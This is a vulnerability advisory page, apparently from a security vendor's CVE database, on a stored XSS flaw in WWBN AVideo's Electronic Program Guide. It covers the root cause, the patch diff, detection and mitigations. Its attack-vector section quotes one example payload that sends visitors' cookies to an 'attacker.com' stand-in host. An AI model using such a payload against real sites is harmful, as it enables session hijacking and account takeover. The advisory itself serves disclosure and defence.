The SentinelOne Annual Threat Report - A Defenders Guide from the FrontlinesThe SentinelOne Annual Threat ReportGet the Report
Experiencing a Breach?Blog
Get StartedContact Us
SentinelOne
  • Platform
    Platform Overview
    • Singularity Platform
      Welcome to Integrated Enterprise Security
    • AI for Security
      Leading the Way in AI-Powered Security Solutions
    • Securing AI
      Accelerate AI Adoption with Secure AI Tools, Apps, and Agents.
    • How It Works
      The Singularity XDR Difference
    • Singularity Marketplace
      One-Click Integrations to Unlock the Power of XDR
    • Pricing & Packaging
      Comparisons and Guidance at a Glance
    Data & AI
    • Purple AI
      Accelerate SecOps with Generative AI
    • Singularity Hyperautomation
      Easily Automate Security Processes
    • AI-SIEM
      The AI SIEM for the Autonomous SOC
    • AI Data Pipelines
      Security Data Pipeline for AI SIEM and Data Optimization
    • Singularity Data Lake
      AI-Powered, Unified Data Lake
    • Singularity Data Lake for Log Analytics
      Seamlessly Ingest Data from On-Prem, Cloud or Hybrid Environments
    Endpoint Security
    • Singularity Endpoint
      Autonomous Prevention, Detection, and Response
    • Singularity XDR
      Native & Open Protection, Detection, and Response
    • Singularity RemoteOps Forensics
      Orchestrate Forensics at Scale
    • Singularity Threat Intelligence
      Comprehensive Adversary Intelligence
    • Singularity Vulnerability Management
      Application & OS Vulnerability Management
    • Singularity Identity
      Identity Threat Detection and Response
    Cloud Security
    • Singularity Cloud Security
      Block Attacks with an AI-Powered CNAPP
    • Singularity Cloud Native Security
      Secure Cloud and Development Resources
    • Singularity Cloud Workload Security
      Real-Time Cloud Workload Protection Platform
    • Singularity Cloud Data Security
      AI-Powered Threat Detection for Cloud Storage
    • Singularity Cloud Security Posture Management
      Detect and Remediate Cloud Misconfigurations
    Securing AI
    • Prompt Security
      Secure AI Tools Across Your Enterprise
  • Why SentinelOne?
    Why SentinelOne?
    • Why SentinelOne?
      Cybersecurity Built for What’s Next
    • Our Customers
      Trusted by the World’s Leading Enterprises
    • Industry Recognition
      Tested and Proven by the Experts
    • About Us
      The Industry Leader in Autonomous Cybersecurity
    Compare SentinelOne
    • Arctic Wolf
    • Broadcom
    • CrowdStrike
    • Cybereason
    • Microsoft
    • Palo Alto Networks
    • Sophos
    • Splunk
    • Trellix
    • Trend Micro
    • Wiz
    Verticals
    • Energy
    • Federal Government
    • Finance
    • Healthcare
    • Higher Education
    • K-12 Education
    • Manufacturing
    • Retail
    • State and Local Government
  • Services
    Managed Services
    • Managed Services Overview
      Wayfinder Threat Detection & Response
    • Threat Hunting
      World-Class Expertise and Threat Intelligence
    • Managed Detection & Response
      24/7/365 Expert MDR Across Your Entire Environment
    • Incident Readiness & Response
      DFIR, Breach Readiness, & Compromise Assessments
    Support, Deployment, & Health
    • Technical Account Management
      Customer Success with Personalized Service
    • SentinelOne GO
      Guided Onboarding & Deployment Advisory
    • SentinelOne University
      Live and On-Demand Training
    • Services Overview
      Comprehensive Solutions for Seamless Security Operations
    • SentinelOne Community
      Community Login
  • Partners
    Our Network
    • MSSP Partners
      Succeed Faster with SentinelOne
    • Singularity Marketplace
      Extend the Power of S1 Technology
    • Cyber Risk Partners
      Enlist Pro Response and Advisory Teams
    • Technology Alliances
      Integrated, Enterprise-Scale Solutions
    • SentinelOne for AWS
      Hosted in AWS Regions Around the World
    • Channel Partners
      Deliver the Right Solutions, Together
    • SentinelOne for Google Cloud
      Unified, Autonomous Security Giving Defenders the Advantage at Global Scale
    • Partner Locator
      Your Go-to Source for Our Top Partners in Your Region
    Partner Portal→
  • Resources
    Resource Center
    • Case Studies
    • Data Sheets
    • eBooks
    • Reports
    • Videos
    • Webinars
    • Whitepapers
    • Events
    View All Resources→
    Blog
    • Feature Spotlight
    • For CISO/CIO
    • From the Front Lines
    • Identity
    • Cloud
    • macOS
    • SentinelOne Blog
    Blog→
    Tech Resources
    • SentinelLABS
    • Ransomware Anthology
    • Cybersecurity 101
  • About
    About SentinelOne
    • About SentinelOne
      The Industry Leader in Cybersecurity
    • Investor Relations
      Financial Information & Events
    • SentinelLABS
      Threat Research for the Modern Threat Hunter
    • Careers
      The Latest Job Opportunities
    • Press & News
      Company Announcements
    • Cybersecurity Blog
      The Latest Cybersecurity Threats, News, & More
    • FAQ
      Get Answers to Our Most Frequently Asked Questions
    • DataSet
      The Live Data Platform
    • S Foundation
      Securing a Safer Future for All
    • S Ventures
      Investing in the Next Generation of Security, Data and AI
  • Pricing
Get StartedContact Us
CVE Vulnerability Database
Vulnerability Database/CVE-2026-39367

CVE-2026-39367: WWBN AVideo EPG XSS Vulnerability

CVE-2026-39367 is a cross-site scripting flaw in WWBN AVideo's Electronic Program Guide that allows attackers to inject malicious scripts via XML files. This article covers technical details, affected versions, and mitigations.

Published: April 10, 2026

CVE-2026-39367 Overview

WWBN AVideo is an open source video platform that contains a stored Cross-Site Scripting (XSS) vulnerability in its Electronic Program Guide (EPG) feature. In versions 26.0 and prior, the platform parses XML from user-controlled URLs and renders programme titles directly into HTML without any sanitization or escaping. A user with upload permission can set a video's epg_link to a malicious XML file whose <title> elements contain JavaScript payloads. This payload executes in the browser of any unauthenticated visitor to the public EPG page, enabling session hijacking and account takeover.

Critical Impact

Attackers with upload permissions can inject malicious JavaScript via crafted XML files, leading to session hijacking and account takeover of any user viewing the public EPG page.

Affected Products

  • WWBN AVideo version 26.0 and prior

Discovery Timeline

  • 2026-04-07 - CVE CVE-2026-39367 published to NVD
  • 2026-04-08 - Last updated in NVD database

Technical Details for CVE-2026-39367

Vulnerability Analysis

This stored Cross-Site Scripting (XSS) vulnerability exists in AVideo's EPG (Electronic Program Guide) functionality within the plugin/PlayerSkins/epg.php file. The application fetches XML data from URLs specified in video configurations and extracts programme titles for display in the EPG interface. The vulnerable code directly embeds these titles into HTML output without applying proper output encoding or sanitization.

When a user with upload permissions configures a video with a malicious epg_link pointing to an attacker-controlled XML file, any JavaScript code embedded in the <title> elements will be rendered and executed in the browsers of visitors to the public EPG page. This represents a stored XSS attack vector since the malicious payload persists in the system through the EPG link configuration.

Root Cause

The root cause of this vulnerability is improper output encoding (CWE-79). The epg.php file directly interpolates the $program['title'] variable into HTML context without using htmlspecialchars() or equivalent escaping functions. This allows attacker-controlled content from XML files to break out of the intended HTML structure and inject arbitrary JavaScript code.

Attack Vector

The attack exploits the network-accessible EPG feature through the following mechanism:

  1. An authenticated user with upload permissions creates or modifies a video entry
  2. The attacker sets the epg_link field to point to a malicious XML file they control
  3. The XML file contains <title> elements with embedded JavaScript payloads (e.g., <title><script>document.location='https://attacker.com/steal?c='+document.cookie</script></title>)
  4. When any user (including unauthenticated visitors) accesses the public EPG page, the platform fetches and parses the malicious XML
  5. The JavaScript payload executes in the victim's browser context, enabling session hijacking, cookie theft, or account takeover

The security patch addresses this by applying htmlspecialchars() with ENT_QUOTES and UTF-8 encoding to all program titles before rendering:

php
                     */
                     $left = ($minuteSize * $minutesSinceZeroTime) + $timeLineElementSize;
                     $width = ($minuteSize * $minutes);
+                    $safeTitle = htmlspecialchars($program['title'], ENT_QUOTES, 'UTF-8');
                     $pclass = '';
                     if ($width <= $minimumWidthHide) {
                         $text = '';
                     } else if ($width <= $minimumWidth1Dot) {
-                        $text = "<abbr title=\"{$program['title']}\">.</abbr>";
+                        $text = "<abbr title=\"{$safeTitle}\">.</abbr>";
                     } else if ($width <= $minimumWidth) {
-                        $text = "<abbr title=\"{$program['title']}\"><small class=\"duration\">{$minutes} Min</small></abbr>";
+                        $text = "<abbr title=\"{$safeTitle}\"><small class=\"duration\">{$minutes} Min</small></abbr>";
                     } else if ($width <= $minimumSmallFont) {
-                        $text = "<small class=\"small-font\">{$program['title']}<div><small class=\"duration\">{$minutes} Min</small></div></small>";
+                        $text = "<small class=\"small-font\">{$safeTitle}<div><small class=\"duration\">{$minutes} Min</small></div></small>";
                     } else {
                         $startTime = date('m-d H:i', strtotime($program['start']));
                         $stopTime = date('m-d H:i', $_stopTime);
-                        $text = "{$program['title']}<div><small class=\"duration\">{$minutes} Min</small></div>";
+                        $text = "{$safeTitle}<div><small class=\"duration\">{$minutes} Min</small></div>";
                     }
                     if ($_stopTime < $nowTime) {
                         $pclass = 'finished';

Source: GitHub Commit e0212add

Detection Methods for CVE-2026-39367

Indicators of Compromise

  • Suspicious epg_link values in video configurations pointing to external or unusual URLs
  • XML files hosted on external domains containing <script> tags or JavaScript event handlers within <title> elements
  • Unusual outbound connections from client browsers when accessing the EPG page
  • Session cookies or authentication tokens being transmitted to third-party domains

Detection Strategies

  • Implement Content Security Policy (CSP) headers to detect and block inline script execution
  • Monitor web application logs for access to the EPG page with unusual referrers or user agents
  • Deploy web application firewall (WAF) rules to detect XSS payloads in XML responses
  • Audit video configurations for epg_link values pointing to untrusted external sources

Monitoring Recommendations

  • Enable browser console logging and monitor for JavaScript errors or unexpected script execution on EPG pages
  • Implement Subresource Integrity (SRI) checks where possible
  • Monitor for anomalous authentication events that may indicate session hijacking
  • Review access logs for the plugin/PlayerSkins/epg.php endpoint for suspicious activity patterns

How to Mitigate CVE-2026-39367

Immediate Actions Required

  • Update WWBN AVideo to a version containing commit e0212add4aad0f1e97758a4b4fdc57df58ce68e8 or later
  • Audit all existing video configurations for suspicious epg_link values pointing to external domains
  • Review user accounts with upload permissions and restrict access where not required
  • Implement Content Security Policy (CSP) headers to mitigate XSS impact

Patch Information

The vulnerability has been addressed in the commit referenced in the GitHub Security Advisory. The fix applies htmlspecialchars() with ENT_QUOTES encoding to all program titles before HTML output, preventing JavaScript injection through XML title elements. Organizations should apply the security patch as soon as possible.

Workarounds

  • Restrict upload permissions to trusted users only until the patch can be applied
  • Implement a whitelist of allowed domains for epg_link configurations
  • Deploy a web application firewall (WAF) with XSS detection rules
  • Disable the EPG feature if not required for business operations
bash
# Example: Add Content-Security-Policy header in Apache configuration
# Add to .htaccess or Apache config file
Header set Content-Security-Policy "default-src 'self'; script-src 'self'; style-src 'self' 'unsafe-inline'"

Disclaimer: This content was generated using AI. While we strive for accuracy, please verify critical information with official sources.

  • Vulnerability Details
  • TypeXSS

  • Vendor/TechAvideo

  • SeverityMEDIUM

  • CVSS Score5.4

  • EPSS Probability0.03%

  • Known ExploitedNo
  • CVSS Vector
  • CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N
  • Impact Assessment
  • ConfidentialityLow
  • IntegrityLow
  • AvailabilityNone
  • CWE References
  • CWE-79
  • Technical References
  • GitHub Commit Changes

  • GitHub Security Advisory
  • Related CVEs
  • CVE-2026-39369: AVideo Path Traversal Vulnerability

  • CVE-2026-39370: WWBN AVideo SSRF Bypass Vulnerability

  • CVE-2026-35448: WWBN AVideo Auth Bypass Vulnerability

  • CVE-2026-35180: WWBN AVideo CSRF Vulnerability
Default Legacy - Prefooter | Experience the World’s Most Advanced Cybersecurity Platform

Experience the World’s Most Advanced Cybersecurity Platform

See how our intelligent, autonomous cybersecurity platform can protect your organization now and into the future.

Try SentinelOne
  • Get Started
  • Get a Demo
  • Product Tour
  • Why SentinelOne
  • Pricing & Packaging
  • FAQ
  • Contact
  • Contact Us
  • Customer Support
  • SentinelOne Status
  • Language
  • Platform
  • Singularity Platform
  • Singularity Endpoint
  • Singularity Cloud
  • Singularity AI-SIEM
  • Singularity Identity
  • Singularity Marketplace
  • Purple AI
  • Services
  • Wayfinder TDR
  • SentinelOne GO
  • Technical Account Management
  • Support Services
  • Verticals
  • Energy
  • Federal Government
  • Finance
  • Healthcare
  • Higher Education
  • K-12 Education
  • Manufacturing
  • Retail
  • State and Local Government
  • Cybersecurity for SMB
  • Resources
  • Blog
  • Labs
  • Case Studies
  • Videos
  • Product Tours
  • Events
  • Cybersecurity 101
  • eBooks
  • Webinars
  • Whitepapers
  • Press
  • News
  • Ransomware Anthology
  • Company
  • About Us
  • Our Customers
  • Careers
  • Partners
  • Legal & Compliance
  • Security & Compliance
  • Investor Relations
  • S Foundation
  • S Ventures

©2026 SentinelOne, All Rights Reserved.

Privacy Notice Terms of Use

English